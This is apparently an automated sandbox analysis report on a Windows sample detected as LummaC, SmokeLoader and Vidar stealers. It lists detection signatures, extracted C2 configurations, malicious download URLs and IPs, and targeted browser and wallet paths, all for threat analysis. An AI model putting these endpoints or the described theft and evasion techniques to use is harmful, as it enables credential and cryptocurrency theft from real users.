Windows Analysis Report
c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe

Overview

General Information

Sample name: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
Analysis ID: 1447731
MD5: a93525f5f13c811e90c56492f5ac934a
SHA1: 37fb7a8b8903f4b614cec214f0ff0c69c88a1864
SHA256: 1b69a9c37210a79131c5cbcfaa4163fb5027989b4537b43a5a6cf6f40a4bab1a
Tags: exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Avira: detected
Antivirus detection for URL or domain
Source: https://whispedwoodmoodsksl.shop/api Avira URL Cloud: Label: malware
Source: whispedwoodmoodsksl.shop Avira URL Cloud: Label: malware
Source: http://185.235.137.54/file/host_so.exe Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/apie Avira URL Cloud: Label: malware
Source: miniaturefinerninewjs.shop Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/X Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp
Source: C:\Users\user\AppData\Roaming\aarhevh Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Found malware configuration
Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 21AE.exe.5640.5.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
Multi AV Scanner detection for domain / URL
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17% Perma Link
Source: dbfhns.in Virustotal: Detection: 5% Perma Link
Source: https://65.109.242.59/ Virustotal: Detection: 7% Perma Link
Source: http://guteyr.cc/tmp/index.php Virustotal: Detection: 15% Perma Link
Source: https://whispedwoodmoodsksl.shop/api Virustotal: Detection: 17% Perma Link
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17% Perma Link
Source: http://185.235.137.54/file/host_so.exe Virustotal: Detection: 19% Perma Link
Source: https://whispedwoodmoodsksl.shop/apie Virustotal: Detection: 14% Perma Link
Source: https://65.109.242.59/l Virustotal: Detection: 5% Perma Link
Source: miniaturefinerninewjs.shop Virustotal: Detection: 19% Perma Link
Source: obsceneclassyjuwks.shop Virustotal: Detection: 18% Perma Link
Source: http://45.129.96.86/file/update.exe Virustotal: Detection: 20% Perma Link
Source: https://65.109.242.59/r Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\21AE.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\aarhevh ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe ReversingLabs: Detection: 55%
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Virustotal: Detection: 59% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\aarhevh Joe Sandbox ML: detected
Machine Learning detection for sample
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0041537E CryptUnprotectData, 5_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA4A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 13_2_6CA4A9A0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA444C0 PK11_PubEncrypt, 13_2_6CA444C0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA14420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 13_2_6CA14420
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA44440 PK11_PrivDecrypt, 13_2_6CA44440
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 13_2_6CA925B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA2E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 13_2_6CA2E6E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA28670 PK11_ExportEncryptedPrivKeyInfo, 13_2_6CA28670
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA4A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 13_2_6CA4A650
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA6A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 13_2_6CA6A730
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA70180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 13_2_6CA70180
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA443B0 PK11_PubEncryptPKCS1,PR_SetError, 13_2_6CA443B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA67C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 13_2_6CA67C00
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA6BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 13_2_6CA6BD30
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA27D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 13_2_6CA27D60
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA69EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 13_2_6CA69EC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA43FF0 PK11_PrivDecryptPKCS1, 13_2_6CA43FF0

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Unpacked PE file: 5.2.21AE.exe.400000.0.unpack
Uses 32bit PE files
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: Binary string: freebl3.pdb source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
Source: Binary string: mozglue.pdbP source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
Source: Binary string: freebl3.pdbp source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
Source: Binary string: nss3.pdb@ source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.13.dr, vcruntime140[1].dll.13.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.13.dr, msvcp140[1].dll.13.dr
Source: Binary string: nss3.pdb source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr
Source: Binary string: mozglue.pdb source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esi+00000910h] 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00409960
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00409960
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] 5_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then dec edx 5_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 5_2_00417062
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 5_2_00417062
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426174
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+54h] 5_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426271
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426284
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 5_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, 00008000h 5_2_00403570
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then cmp cl, 0000002Eh 5_2_00421580
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h 5_2_00414660
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edi, ebx 5_2_00436670
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_00431680
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+000000C0h] 5_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h 5_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_00423931
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then jmp edx 5_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+4Ch] 5_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 5_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then jmp edx 5_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esi+08h] 5_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movzx esi, word ptr [ecx] 5_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] 5_2_02156248
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then dec edx 5_2_0217B2B7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 5_2_021572C9
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 5_2_021572C9
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then cmp cl, 0000002Eh 5_2_021612E0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_021663DB
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then jmp edx 5_2_0215D097
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movzx esi, word ptr [ecx] 5_2_0217917C
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 5_2_02156739
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, 00008000h 5_2_021437D7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_021664D8
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_021664EB
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_02150519
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esi+00000910h] 5_2_021675BA
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 5_2_021675BA
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_02156B56
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_02164B47
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_02163B98
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 5_2_02144BD7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_02149BC7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_02149BC7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_02164B47
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_02142807
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edi, ebx 5_2_021768D7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h 5_2_021548C7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_021718E7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+000000C0h] 5_2_02150918
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esi+08h] 5_2_02173E13
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_0214FE1B
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_02163ECF
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_02163EFE
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then jmp dword ptr [004421CCh] 5_2_0215CF1A
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_02165F55
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h] 5_2_02161C89
